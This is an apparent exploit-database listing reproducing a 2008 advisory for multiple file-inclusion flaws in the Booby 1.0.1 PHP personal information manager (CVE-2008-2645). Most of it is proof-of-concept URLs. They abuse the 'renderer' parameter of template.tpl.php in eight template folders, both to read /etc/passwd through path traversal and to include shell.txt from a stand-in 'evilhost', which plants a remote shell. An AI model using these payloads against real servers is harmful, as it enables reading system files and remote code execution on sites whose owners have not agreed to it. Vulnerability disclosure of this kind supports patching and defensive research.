[] NeoSense
E X P L O I T S
title author type platform port cve id

Booby 1.0.1 - Multiple Remote File Inclusions

Author: HaiHui
type: webapps
platform: php
port: 
date_added: 2008-06-01 
date_updated: 2016-12-07 
verified: 1 
codes: OSVDB-46333;CVE-2008-2645;OSVDB-46332;OSVDB-46331;OSVDB-46330;OSVDB-46329;OSVDB-46328;OSVDB-46327;OSVDB-46326 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.combooby-1.0.1-12_May_2005.tar.gz
#software name: Booby
#version: 1.0.1
#description: A Webbased Personal Information Manager (PIM) with support for bookmarks, calendar, contacts, notes, news and tasks.
#download: http://sourceforge.net/project/showfiles.php?group_id=87672&package_id=91447&release_id=326826
#bug: Multiple Remote Vulnerabilities
#contact: mailbox1333@gmail.com

Local File Include / Remote File Include in: template.tpl.php

Proof Of Concept LFI: http://localhost/path/templates/barrel/template.tpl.php?renderer=../../../../../../etc/passwd
                      http://localhost/path/templates/barry/template.tpl.php?renderer=../../../../../../etc/passwd
                      http://localhost/path/templates/mylook/template.tpl.php?renderer=../../../../../../etc/passwd
                      http://localhost/path/templates/oerdec/template.tpl.php?renderer=../../../../../../etc/passwd
                      http://localhost/path/templates/penguin/template.tpl.php?renderer=../../../../../../etc/passwd
                      http://localhost/path/templates/sidebar/template.tpl.php?renderer=../../../../../../etc/passwd
                      http://localhost/path/templates/slashdot/template.tpl.php?renderer=../../../../../../etc/passwd
                      http://localhost/path/templates/text-only/template.tpl.php?renderer=../../../../../../etc/passwd

Proof Of Concept RFI: http://localhost/path/templates/barrel/template.tpl.php?renderer=evilhost/shell.txt
                      http://localhost/path/templates/barry/template.tpl.php?renderer=evilhost/shell.txt
                      http://localhost/path/templates/mylook/template.tpl.php?renderer=evilhost/shell.txt
                      http://localhost/path/templates/oerdec/template.tpl.php?renderer=evilhost/shell.txt
                      http://localhost/path/templates/penguin/template.tpl.php?renderer=evilhost/shell.txt
                      http://localhost/path/templates/sidebar/template.tpl.php?renderer=evilhost/shell.txt
                      http://localhost/path/templates/slashdot/template.tpl.php?renderer=evilhost/shell.txt
                      http://localhost/path/templates/text-only/template.tpl.php?renderer=evilhost/shell.txt



regards> ph03n1xbroc / zuh_runezz / sara / sirzion / ov / mozi / picolo_elfo /

# milw0rm.com [2008-06-02]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.